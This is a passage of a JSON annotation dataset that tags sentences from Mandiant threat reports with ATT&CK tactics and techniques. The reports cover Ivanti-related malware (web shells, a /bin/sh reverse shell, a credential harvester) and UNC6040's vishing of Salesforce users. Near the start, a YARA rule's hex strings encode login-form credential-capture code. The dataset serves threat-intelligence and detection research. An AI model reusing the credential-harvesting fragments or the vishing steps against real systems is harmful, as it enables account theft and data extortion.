76 61 6c 75 65 3b} $s2 = {76 61 72 20 73 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 66 72 6d 4c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 2e 76 61 6c 75 65 3b} $s3 = {2b 77 64 61 74 61 2b 27 26 27 2b 73 64 61 74 61 3b} $s4 = {76 61 72 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74} $s5 = \"Remember the last selected auth realm for 30 days\" ascii condition:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s60-cac22d", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 60, "context_before": "md5 = \"d0c7a334a4d9dcd3c6335ae13bee59ea\" strings:\n$s1 = {76 61 72 20 77 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 66 72 6d 4c 6f 67 69 6e 2e 75 73 65 72 6e 61 6d 65 2e 76 61 6c 75 65 3b} $s2 = {76 61 72 20 73 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 66 72 6d 4c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 2e 76 61 6c 75 65 3b} $s3 = {2b 77 64 61 74 61 2b 27 26 27 2b 73 64 61 74 61 3b} $s4 = {76 61 72 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74} $s5 = \"Remember the last selected auth realm for 30 days\" ascii condition:", "sentence_text": "filesize < 8KB and all of them } Posted in Threat Intelligence Security & Identity Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s61-a225e4", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 61, "context_before": "filesize < 8KB and all of them } Posted in Threat Intelligence Security & Identity Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "The command contains the file path and its content to be saved on the compromised system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s62-797a24", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 62, "context_before": "The command contains the file path and its content to be saved on the compromised system.", "sentence_text": "A reverse shell is created using /bin/sh and the provided command is executed LIGHTWIRE | compcheckresult.cgi", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" }, { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Create a reverse shell using /bin/sh and execute the provided command.", "entities": [ { "text": "created using /bin/sh and the provided command is executed", "start": 19, "end": 77, "label": "Action" }, { "text": "/bin/sh", "start": 33, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "LIGHTWIRE", "start": 78, "end": 87, "label": "MalwareTool" }, { "text": "compcheckresult.cgi", "start": 90, "end": 109, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s63-b7d161", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 63, "context_before": "A reverse shell is created using /bin/sh and the provided command is executed LIGHTWIRE | compcheckresult.cgi", "sentence_text": "| Web shell THINSPOOL | sessionserver.sh", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s64-829c9d", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 64, "context_before": "| Web shell THINSPOOL | sessionserver.sh", "sentence_text": "| Web shell dropper WARPWIRE | lastauthserverused.js", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s65-5c9b84", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 65, "context_before": "| Web shell dropper WARPWIRE | lastauthserverused.js", "sentence_text": "| Credential harvester WIREFIRE | visits.py | Web shell THINSPOOL Utility | sessionserver.pl | Script ZIPLINE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s66-b5c43f", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 66, "context_before": "| Credential harvester WIREFIRE | visits.py | Web shell THINSPOOL Utility | sessionserver.pl | Script ZIPLINE", "sentence_text": "| libsecure.so.1 | Passive backdoor symantke[.]com | WARPWIRE C2", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s1-a7197c", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "[START]", "sentence_text": "While emphasizing Salesforce-specific security recommendations, these strategies provide organizations with actionable approaches to safeguard their SaaS ecosystem against current threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s2-f9e414", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 2, "context_before": "While emphasizing Salesforce-specific security recommendations, these strategies provide organizations with actionable approaches to safeguard their SaaS ecosystem against current threats.", "sentence_text": "Google Threat Intelligence Group (GTIG) is tracking UNC6040, a financially motivated threat cluster that specializes in voice phishing (vishing) campaigns specifically designed to compromise organizations' Salesforce instances for large-scale data theft and subsequent extortion.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s3-03ae1b", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 3, "context_before": "Google Threat Intelligence Group (GTIG) is tracking UNC6040, a financially motivated threat cluster that specializes in voice phishing (vishing) campaigns specifically designed to compromise organizations' Salesforce instances for large-scale data theft and subsequent extortion.", "sentence_text": "Over the past several months, UNC6040 has demonstrated repeated success in breaching networks by having its operators impersonate IT support personnel in convincing telephone-based social engineering engagements.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "The attacker impersonates IT support personnel to breach networks.", "entities": [ { "text": "UNC6040", "start": 30, "end": 37, "label": "ThreatActor" }, { "text": "impersonate IT support personnel", "start": 118, "end": 150, "label": "Action" }, { "text": "breaching networks", "start": 75, "end": 93, "label": "Action" } ] }, { "uid": "mandiant-31_mandiant_report-p1-s4-cb6162", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 4, "context_before": "Over the past several months, UNC6040 has demonstrated repeated success in breaching networks by having its operators impersonate IT support personnel in convincing telephone-based social engineering engagements.", "sentence_text": "In all observed cases, attackers relied on manipulating end users, not exploiting any vulnerability inherent to Salesforce.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s5-abaecb", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 5, "context_before": "In all observed cases, attackers relied on manipulating end users, not exploiting any vulnerability inherent to Salesforce.", "sentence_text": "A prevalent tactic in UNC6040's operations involves deceiving victims into authorizing a malicious connected app to their organization's Salesforce portal.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Deceive victims into authorizing a malicious connected app to the organization's Salesforce portal.", "entities": [ { "text": "UNC6040", "start": 22, "end": 29, "label": "ThreatActor" }, { "text": "involves deceiving victims into authorizing a malicious connected app to their organization's Salesforce portal", "start": 43, "end": 154, "label": "Action" }, { "text": "Salesforce portal", "start": 137, "end": 154, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-31_mandiant_report-p1-s6-d68f20", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 6, "context_before": "A prevalent tactic in UNC6040's operations involves deceiving victims into authorizing a malicious connected app to their organization's Salesforce portal.", "sentence_text": "This application is often a modified version of Salesforce’s Data Loader, not authorized by Salesforce.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s7-35bf90", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 7, "context_before": "This application is often a modified version of Salesforce’s Data Loader, not authorized by Salesforce.", "sentence_text": "During a vishing call, the actor guides the victim to visit Salesforce's connected app setup page to approve a version of the Data Loader app with a name or branding that differs from the legitimate version.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.004", "name": "Spearphishing Voice" } ], "procedure": "Guide the victim during a vishing call to visit the Salesforce connected app setup page and approve a malicious Data Loader app.", "entities": [ { "text": "guides the victim to visit Salesforce's connected app setup page to approve a version of the Data Loader app", "start": 33, "end": 141, "label": "Action" }, { "text": "Salesforce's connected app setup page", "start": 60, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "Data Loader app", "start": 126, "end": 141, "label": "MalwareTool" } ] }, { "uid": "mandiant-31_mandiant_report-p1-s8-5ef89b", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 8, "context_before": "During a vishing call, the actor guides the victim to visit Salesforce's connected app setup page to approve a version of the Data Loader app with a name or branding that differs from the legitimate version.", "sentence_text": "This step inadvertently grants UNC6040 significant capabilities to access, query, and exfiltrate sensitive information directly from the compromised Salesforce customer environments.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Access, query, and exfiltrate sensitive information from compromised Salesforce environments.", "entities": [ { "text": "UNC6040", "start": 31, "end": 38, "label": "ThreatActor" }, { "text": "access, query, and exfiltrate sensitive information directly from the compromised Salesforce customer environments", "start": 67, "end": 181, "label": "Action" }, { "text": "Salesforce customer environments", "start": 149, "end": 181, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-31_mandiant_report-p1-s9-2ffb0b", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 9, "context_before": "This step inadvertently grants UNC6040 significant capabilities to access, query, and exfiltrate sensitive information directly from the compromised Salesforce customer environments.", "sentence_text": "This methodology of abusing Data Loader functionalities via malicious connected apps is consistent with recent observations detailed by Salesforce in their guidance on protecting Salesforce environments from such threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s10-bec633", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 10, "context_before": "This methodology of abusing Data Loader functionalities via malicious connected apps is consistent with recent observations detailed by Salesforce in their guidance on protecting Salesforce environments from such threats.", "sentence_text": "We have observed the following patterns in UNC6040 victimology:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s11-085878", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 11, "context_before": "We have observed the following patterns in UNC6040 victimology:", "sentence_text": "Motive:\nUNC6040 is a financially motivated threat cluster that accesses victim networks by vishing social engineering.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s12-fbb27d", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 12, "context_before": "Motive:\nUNC6040 is a financially motivated threat cluster that accesses victim networks by vishing social engineering.", "sentence_text": "Focus:\nUpon obtaining access, UNC6040 has been observed immediately exfiltrating data from the victim’s Salesforce environment using Salesforce’s Data Loader application.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage" } ], "procedure": "Exfiltrate data from the victim’s Salesforce environment using the Data Loader application.", "entities": [ { "text": "UNC6040", "start": 30, "end": 37, "label": "ThreatActor" }, { "text": "has been observed immediately exfiltrating data from the victim’s Salesforce environment using Salesforce’s Data Loader application", "start": 38, "end": 169, "label": "Action" }, { "text": "Salesforce environment", "start": 104, "end": 126, "label": "Infrastructure_Indicator" }, { "text": "Salesforce’s Data Loader application", "start": 133, "end": 169, "label": "MalwareTool" } ] }, { "uid": "mandiant-31_mandiant_report-p1-s13-aa13d6", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 13, "context_before": "Focus:\nUpon obtaining access, UNC6040 has been observed immediately exfiltrating data from the victim’s Salesforce environment using Salesforce’s Data Loader application.", "sentence_text": "Attacker infrastructure:\nUNC6040 primarily used Mullvad VPN IP addresses to access and perform the data exfiltration on the victim’s Salesforce environments and other services of the victim's network.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" }, { "id": "T1090", "name": "Proxy" } ], "procedure": "Use Mullvad VPN IP addresses to access victim environments and perform data exfiltration.", "entities": [ { "text": "UNC6040", "start": 25, "end": 32, "label": "ThreatActor" }, { "text": "used Mullvad VPN IP addresses to access and perform the data exfiltration on the victim’s Salesforce environments and other services of the victim's network", "start": 43, "end": 199, "label": "Action" }, { "text": "Mullvad VPN IP addresses", "start": 48, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "Salesforce environments", "start": 133, "end": 156, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-31_mandiant_report-p1-s14-a3667d", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 14, "context_before": "Attacker infrastructure:\nUNC6040 primarily used Mullvad VPN IP addresses to access and perform the data exfiltration on the victim’s Salesforce environments and other services of the victim's network.", "sentence_text": "Proactive Hardening Recommendations", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s15-3a1460", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 15, "context_before": "Proactive Hardening Recommendations", "sentence_text": "The following section provides prioritized recommendations to protect against tactics utilized by UNC6040.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s16-8542fd", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 16, "context_before": "The following section provides prioritized recommendations to protect against tactics utilized by UNC6040.", "sentence_text": "This section is broken down to the following categories:\nIdentity\nHelp Desk and End User Verification Identity Validation and Protections SaaS Applications SaaS Application (e.g., Salesforce)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s17-edbac6", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 17, "context_before": "This section is broken down to the following categories:\nIdentity\nHelp Desk and End User Verification Identity Validation and Protections SaaS Applications SaaS Application (e.g., Salesforce)", "sentence_text": "This process moves beyond outdated, easily compromised methods and establishes a higher standard of assurance for all support requests, especially those involving account modifications (e.g., password resets or multi-factor authentication modifications).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s18-728395", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 18, "context_before": "This process moves beyond outdated, easily compromised methods and establishes a higher standard of assurance for all support requests, especially those involving account modifications (e.g., password resets or multi-factor authentication modifications).", "sentence_text": "Guiding Principles\nAssume nothing:\nDo not inherently trust the caller's stated identity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s19-abc7e4", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 19, "context_before": "Guiding Principles\nAssume nothing:\nDo not inherently trust the caller's stated identity.", "sentence_text": "Verification is mandatory for all security-related requests.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s20-11304b", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 20, "context_before": "Verification is mandatory for all security-related requests.", "sentence_text": "Defense-in-depth:\nRely on a combination of verification methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s21-06f894", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 21, "context_before": "Defense-in-depth:\nRely on a combination of verification methods.", "sentence_text": "No single factor should be sufficient for high-risk actions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s22-a5a61d", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 22, "context_before": "No single factor should be sufficient for high-risk actions.", "sentence_text": "Reject unsafe identifiers:\nAvoid relying on publicly available or easily discoverable data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s23-a9f9d8", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 23, "context_before": "Reject unsafe identifiers:\nAvoid relying on publicly available or easily discoverable data.", "sentence_text": "Information such as:\nDate of birth Last four digits of a Social Security number High school names Supervisor names This data should not be used as primary verification factors, as it's often compromised through data breaches or obtainable via open source intelligence (OSINT).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s24-a2f552", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 24, "context_before": "Information such as:\nDate of birth Last four digits of a Social Security number High school names Supervisor names This data should not be used as primary verification factors, as it's often compromised through data breaches or obtainable via open source intelligence (OSINT).", "sentence_text": "Standard Verification Procedures Live Video Identity Proofing (Primary Method)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s25-0ee427", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 25, "context_before": "Standard Verification Procedures Live Video Identity Proofing (Primary Method)", "sentence_text": "This is the most reliable method for identifying callers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s26-e6491a", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 26, "context_before": "This is the most reliable method for identifying callers.", "sentence_text": "Additionally, before proceeding with any request - help desk personnel must check the user's calendar for Out of Office (OOO) or vacation status.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s27-303b14", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 27, "context_before": "Additionally, before proceeding with any request - help desk personnel must check the user's calendar for Out of Office (OOO) or vacation status.", "sentence_text": "All requests from users who are marked as OOO should be presumptively denied until they have officially returned.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s28-d00963", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 28, "context_before": "All requests from users who are marked as OOO should be presumptively denied until they have officially returned.", "sentence_text": "Out-of-Band (OOB) Verification (For High-Risk Requests)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s29-74271f", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 29, "context_before": "Out-of-Band (OOB) Verification (For High-Risk Requests)", "sentence_text": "For high-risk changes like multi-factor authentication (MFA) resets or password changes for privileged accounts, an additional OOB verification step is required after the initial ID proofing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s30-b94f59", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 30, "context_before": "For high-risk changes like multi-factor authentication (MFA) resets or password changes for privileged accounts, an additional OOB verification step is required after the initial ID proofing.", "sentence_text": "This can include:\nCall-back:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s31-44dd55", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 31, "context_before": "This can include:\nCall-back:", "sentence_text": "Placing a call to the user's registered phone number on file Manager approval:\nSending a request for confirmation to the user's direct manager via a verified corporate communication channel Special Handling for Third-Party Vendor Requests Under no circumstances should the Help Desk move forward with allowing access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s32-f79f8c", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 32, "context_before": "Placing a call to the user's registered phone number on file Manager approval:\nSending a request for confirmation to the user's direct manager via a verified corporate communication channel Special Handling for Third-Party Vendor Requests Under no circumstances should the Help Desk move forward with allowing access.", "sentence_text": "The agent must halt the request and follow this procedure:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s33-b15440", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 33, "context_before": "The agent must halt the request and follow this procedure:", "sentence_text": "Verification procedures should include:\nHanging up and calling the official account manager using a phone number on file Requiring the requester to submit a ticket through the official company support portal Asking for a valid ticket number that can be confirmed in the support console Organizations should also provide a clear and accessible process for end-users to report suspicious communications and ensure this reporting mechanism is included in all security awareness outreach.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s34-cd4c63", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 34, "context_before": "Verification procedures should include:\nHanging up and calling the official account manager using a phone number on file Requiring the requester to submit a ticket through the official company support portal Asking for a valid ticket number that can be confirmed in the support console Organizations should also provide a clear and accessible process for end-users to report suspicious communications and ensure this reporting mechanism is included in all security awareness outreach.", "sentence_text": "Salesforce has additional guidance that can be referenced.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s35-1d8536", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 35, "context_before": "Salesforce has additional guidance that can be referenced.", "sentence_text": "Guiding Principles\nAuthentication boundary\nThis principle establishes a foundational layer of trust based on network context.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s36-cebf54", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 36, "context_before": "Guiding Principles\nAuthentication boundary\nThis principle establishes a foundational layer of trust based on network context.", "sentence_text": "Access to sensitive resources should be confined within a defined boundary, primarily allowing connections from trusted corporate networks and VPNs to create a clear distinction between trusted and untrusted locations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s37-f7156d", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 37, "context_before": "Access to sensitive resources should be confined within a defined boundary, primarily allowing connections from trusted corporate networks and VPNs to create a clear distinction between trusted and untrusted locations.", "sentence_text": "Defense-in-depth\nThis principle dictates that security cannot rely on a single control.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s38-9e988e", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 38, "context_before": "Defense-in-depth\nThis principle dictates that security cannot rely on a single control.", "sentence_text": "Identity detection and response Organizations must continuously integrate real-time threat intelligence into access decisions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s39-275b24", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 39, "context_before": "Identity detection and response Organizations must continuously integrate real-time threat intelligence into access decisions.", "sentence_text": "This ensures that if an identity is compromised or exhibits risky behavior, its access is automatically contained or blocked until the threat has been remediated.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s40-eb9b08", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 40, "context_before": "This ensures that if an identity is compromised or exhibits risky behavior, its access is automatically contained or blocked until the threat has been remediated.", "sentence_text": "Identity Security Controls The following controls are essential for securing access to SaaS applications through a central identity provider.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s41-1fa0c6", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 41, "context_before": "Identity Security Controls The following controls are essential for securing access to SaaS applications through a central identity provider.", "sentence_text": "Utilize Single Sign-On (SSO", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s42-c0f493", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 42, "context_before": "Utilize Single Sign-On (SSO", "sentence_text": "A platform-native break glass account should be created and vaulted for use only in the case of an emergency.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s43-5c6dc2", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 43, "context_before": "A platform-native break glass account should be created and vaulted for use only in the case of an emergency.", "sentence_text": "Mandate Phishing-Resistant MFA Phishing-resistant MFA must be enforced for all users accessing SaaS applications.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s44-376a08", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 44, "context_before": "Mandate Phishing-Resistant MFA Phishing-resistant MFA must be enforced for all users accessing SaaS applications.", "sentence_text": "This is a foundational requirement to defend against credential theft and account takeovers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s45-a27ddd", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 45, "context_before": "This is a foundational requirement to defend against credential theft and account takeovers.", "sentence_text": "Consider enforcing physical FIDO2 keys for accounts with privileged access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s46-6cdb85", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 46, "context_before": "Consider enforcing physical FIDO2 keys for accounts with privileged access.", "sentence_text": "Ensure that no MFA bypasses exist in authentication policies tied to business critical applications.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s47-18ab15", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 47, "context_before": "Ensure that no MFA bypasses exist in authentication policies tied to business critical applications.", "sentence_text": "For Microsoft Entra ID:\nGeneral MFA Policy:\nEnforce MFA for all users with Conditional Access Passkey (FIDO2) Setup:\nEnable passkey and FIDO2 security keys For Okta:\nConfigure FIDO2 (WebAuthn):\nSet up the FIDO2 (WebAuthn) authenticator Enforce via Policy:\nCreate an Authentication Policy to require strong authenticators For Google Cloud Identity / Workspace:\nGeneral MFA Policy:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s48-1b3b92", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 48, "context_before": "For Microsoft Entra ID:\nGeneral MFA Policy:\nEnforce MFA for all users with Conditional Access Passkey (FIDO2) Setup:\nEnable passkey and FIDO2 security keys For Okta:\nConfigure FIDO2 (WebAuthn):\nSet up the FIDO2 (WebAuthn) authenticator Enforce via Policy:\nCreate an Authentication Policy to require strong authenticators For Google Cloud Identity / Workspace:\nGeneral MFA Policy:", "sentence_text": "Deploy 2-Step Verification Security Key enforcement:\nUse a security key for 2-Step Verification For Salesforce:\nMFA is required by default for local Salesforce accounts:\nSalesforce Multi-Factor Authentication FAQ Configure FIDO2 (WebAuthn):\nRegister a Security Key as an Identity Verification Method for Salesforce Orgs Enforce Device Trust and Compliance Access to corporate applications must be limited to devices that are either domain-joined or verified as compliant with the organization's security standards.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s49-a1a998", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 49, "context_before": "Deploy 2-Step Verification Security Key enforcement:\nUse a security key for 2-Step Verification For Salesforce:\nMFA is required by default for local Salesforce accounts:\nSalesforce Multi-Factor Authentication FAQ Configure FIDO2 (WebAuthn):\nRegister a Security Key as an Identity Verification Method for Salesforce Orgs Enforce Device Trust and Compliance Access to corporate applications must be limited to devices that are either 